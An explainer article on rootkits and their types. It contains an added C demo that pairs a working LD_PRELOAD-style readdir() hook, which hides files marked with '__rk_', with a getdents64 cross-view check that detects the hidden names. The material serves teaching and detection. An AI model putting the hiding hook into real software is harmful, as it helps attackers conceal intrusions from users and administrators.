What is a rootkit?
A rootkit is a set of programs or tools that gives an attacker persistent administrator-level ("root") access to a computer while concealing that access. The name combines "root", the traditional Unix name for the superuser account, and "kit", the bundle of tools that provides and hides that access. Attackers install a rootkit to mask an intrusion and carry on malicious activity stealthily, because rootkits are considerably harder to detect and remove than ordinary malware.
Attackers usually first obtain user-level access to a computer by exploiting a security vulnerability or by guessing weak credentials, then escalate to administrator privileges by exploiting further vulnerabilities. The rootkit is installed once that level of access has been reached, to keep it.
What does a rootkit do?
A rootkit can be installed on a system for several purposes:
- It can install spyware to secretly monitor the user and steal sensitive data.
- It can install a keylogger to record the user's keystrokes and steal credentials.
- It can install a backdoor that gives the attackers full access to the system whenever they want it.
- It can alter or delete system logs to stay hidden, and use the compromised host to spread malware to other systems on the network.
What are the different types of rootkits?
There can be several types of rootkits:
User-mode Rootkit
User-mode rootkits run in user space, usually with administrative privileges, alongside ordinary applications. Rather than touching the kernel, they intercept the library and API calls that programs use to list processes, files, drives, network ports and services (by injecting code into processes, patching import tables, or, on Linux, preloading a shared library) and filter the attacker's artifacts out of the results. They typically register themselves to launch at system start and can alter security settings. Because the kernel is unmodified, a tool that queries the kernel directly, or compares its own view with what the hooked APIs report, can still see them, so user-mode rootkits are less stealthy and easier to detect and remove than kernel-mode ones.
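As an added example, not code from the original article: the shortest form of this technique on Linux, where a user-mode rootkit ships a shared library that is loaded into dynamically linked programs through LD_PRELOAD or /etc/ld.so.preload and overrides readdir() so that file names carrying a chosen marker never reach the caller. The same program contains the cross-view check that detects it: enumerate the directory again through the raw getdents64 system call, which a user-mode hook cannot intercept, and report every name the library view left out. The marker prefix `__rk_`, the scratch directory under /tmp and the file names are assumptions made for the demo; it assumes Linux x86-64 with glibc (link with -ldl on glibc older than 2.34).

```c
/* Added example, not code from the original page: a user-mode file-hiding
 * hook of the kind a Linux rootkit ships in an LD_PRELOAD library, next to
 * the cross-view check that exposes it. Assumes Linux x86-64 with glibc;
 * the prefix "__rk_", the /tmp scratch directory and the file names are
 * chosen for this demonstration. Build: gcc -o rkdemo rkdemo.c */
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

#define HIDE_PREFIX "__rk_"     /* assumption: marker for names the hook hides */
#define MAX_NAMES   256
#define NAME_LEN    256

/* Policy: which names the hook suppresses. */
int should_hide(const char *name)
{
    return strncmp(name, HIDE_PREFIX, strlen(HIDE_PREFIX)) == 0;
}

/* The hook. Defined in the executable (or in a preloaded library) it shadows
 * libc's readdir(); RTLD_NEXT resolves the real one behind it. Callers such
 * as ls never see entries whose name starts with HIDE_PREFIX. */
struct dirent *readdir(DIR *dirp)
{
    static struct dirent *(*real_readdir)(DIR *);
    if (!real_readdir)
        *(void **)&real_readdir = dlsym(RTLD_NEXT, "readdir");
    struct dirent *de;
    while ((de = real_readdir(dirp)) != NULL)
        if (!should_hide(de->d_name))
            return de;          /* pass unmarked entries through */
    return NULL;                /* end of directory (hidden entries skipped) */
}

/* Record layout the kernel returns from getdents64 (glibc exports no name for it). */
struct kdirent64 {
    uint64_t d_ino;
    int64_t  d_off;
    uint16_t d_reclen;
    uint8_t  d_type;
    char     d_name[];
};

/* Cross-view check: a user-mode hook alters library calls, not the system call.
 * Names that getdents64 returns but readdir() does not are hidden.
 * Returns the number of hidden names (copied into out), or -1 on error. */
int find_hidden_entries(const char *path, char out[][NAME_LEN], int max_out)
{
    char seen[MAX_NAMES][NAME_LEN];
    int nseen = 0, nhidden = 0;

    DIR *d = opendir(path);                     /* view 1: hooked library */
    if (!d) return -1;
    struct dirent *de;
    while ((de = readdir(d)) != NULL && nseen < MAX_NAMES)
        snprintf(seen[nseen++], NAME_LEN, "%s", de->d_name);
    closedir(d);

    int fd = open(path, O_RDONLY | O_DIRECTORY); /* view 2: raw syscall */
    if (fd < 0) return -1;
    uint64_t buf[1024];                          /* 8-byte aligned scratch */
    long n;
    while ((n = syscall(SYS_getdents64, fd, buf, sizeof buf)) > 0) {
        for (long off = 0; off < n;) {
            struct kdirent64 *kd = (struct kdirent64 *)((char *)buf + off);
            if (kd->d_reclen == 0) break;        /* defensive: never spin */
            int listed = 0;
            for (int i = 0; i < nseen; i++)
                if (strcmp(seen[i], kd->d_name) == 0) { listed = 1; break; }
            if (!listed && nhidden < max_out)
                snprintf(out[nhidden++], NAME_LEN, "%s", kd->d_name);
            off += kd->d_reclen;
        }
    }
    close(fd);
    return nhidden;
}

/* Creates a scratch directory with one visible and one marked file, runs the
 * check, cleans up, and returns the number of hidden names found. */
int demo_run(void)
{
    char dir[] = "/tmp/rkdemo.XXXXXX";         /* assumption: /tmp is writable */
    if (!mkdtemp(dir)) return -1;
    char vis[300], hid[300], found[16][NAME_LEN];
    snprintf(vis, sizeof vis, "%s/visible.txt", dir);
    snprintf(hid, sizeof hid, "%s/%ssecret", dir, HIDE_PREFIX);
    close(open(vis, O_CREAT | O_WRONLY, 0600));
    close(open(hid, O_CREAT | O_WRONLY, 0600));

    int n = find_hidden_entries(dir, found, 16);
    for (int i = 0; i < n; i++)
        printf("hidden from readdir(): %s\n", found[i]);

    unlink(vis); unlink(hid); rmdir(dir);
    return n;
}

int main(void)
{
    return demo_run() == 1 ? 0 : 1;
}
```

Compiled as a shared object and preloaded, the same readdir() definition hides the marked files from ls and every other dynamically linked program, which is all a user-mode rootkit needs for day-to-day concealment. Statically linked tools and direct system calls keep the true view, which is why the comparison works: the kernel is still honest. A kernel-mode rootkit closes exactly that gap by doctoring the system call's answer as well.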
Kernel-mode Rootkit
Kernel-mode rootkits run with kernel privileges, typically as a loaded driver or kernel module, and modify the operating system kernel itself, for example by hooking system call handlers or altering the kernel's own data structures. Once the kernel is modified, nothing that runs on top of it can be trusted to report the system's state accurately, because the kernel itself returns the doctored answers. This makes kernel-mode rootkits extremely stealthy and very difficult to detect and remove from within the running system.
Hybrid Rootkit
A hybrid rootkit combines user-mode and kernel-mode components, for example a kernel driver that hides files and processes together with user-space code that carries the payload or talks to the attacker. It is the most common type of rootkit and is widely used by attackers to infect a system without being noticed.
Firmware Rootkit
Firmware rootkits store themselves in system firmware (such as the BIOS/UEFI, or the firmware of a disk or network card) rather than on the operating system's disk, so they survive a shutdown and are loaded again when the system starts, before the operating system does. These rootkits are difficult to remove: if a removal program finds and deletes the rootkit's operating-system components without also cleaning the firmware, the rootkit reinstalls …